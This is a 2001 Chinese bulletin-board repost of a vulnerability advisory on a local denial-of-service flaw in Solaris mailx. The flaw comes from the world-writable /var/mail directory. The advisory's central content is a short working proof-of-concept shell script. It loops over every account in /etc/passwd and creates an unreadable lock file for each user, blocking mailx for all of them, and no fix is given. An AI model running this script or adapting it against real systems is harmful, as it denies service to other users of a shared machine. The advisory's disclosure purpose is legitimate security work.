PersonalCorpus 版 (精华区)

发信人: dormouse (期待vs断线的风筝熬日子), 信区: Hacker
标  题: Solaris mailx 锁文件拒绝服务攻击
发信站: 哈工大紫丁香 (2001年01月07日10:38:55 星期天), 站内信件

发信人: scz (小四), 信区: Security
标  题: Solaris mailx 锁文件拒绝服务攻击
发信站: 武汉白云黄鹤站 (Fri Jan  5 11:33:44 2001), 站内信件

漏洞名称：Solaris mailx 锁文件拒绝服务攻击
类    型：本地 未能正确处理例外情形
发布日期：2001-01-05

受影响的系统：

    Sun Solaris 8.0
    Sun Solaris 7.0
    Sun Solaris 2.6

漏洞描述：

mailx 是绝大多数Unix操作系统上都有的一种Mail User Agent。Solaris携带的mailx
存在一些设计上的问题。缺省情况下，/var/mail目录是全局可写的。当
/var/mail/$LOGNAME.lock文件存在的时候，相应用户无法在此使用mailx。恶意的本
地用户可以提前建立任意用户对应的锁文件，从而导致相应用户无法正常使用mailx。

<* 来源：optyx (optyx@uberhax0r.net) *>

测试程序：

下列测试程序来自 optyx (optyx@uberhax0r.net)

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
#!/bin/sh
# Solaris mailx(1) username.lock proof of theory
# makes mailx not work for all users except
# those that can erase the lockfile
# even so mailx will hang for a long time
# Tested on Solaris 2.6, 7, 8
# by Optyx <optyx@uberhax0r.net>
# http://www.uberhax0r.net
echo "mailx-lock by optyx. http://www.uberhax0r.net"
for x in `cat /etc/passwd | cut -d':' -f1`;do
touch /var/mail/$x.lock
chmod 0 /var/mail/$x.lock
done
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

解决方案：


    暂无
--


            也许有一天，他再从海上蓬蓬的雨点中升起，
            飞向西来，再形成一道江流，再冲倒两旁的石壁，
            再来寻夹岸的桃花。然而，我不敢说来生，也不敢信来生......

※ 来源:．武汉白云黄鹤站 bbs.whnet.edu.cn．[FROM: 210.73.87.125]
--
  

    I am dormouse.    我是睡鼠
    too lazy.

※ 来源:·哈工大紫丁香 bbs.hit.edu.cn·[FROM: 202.118.228.206]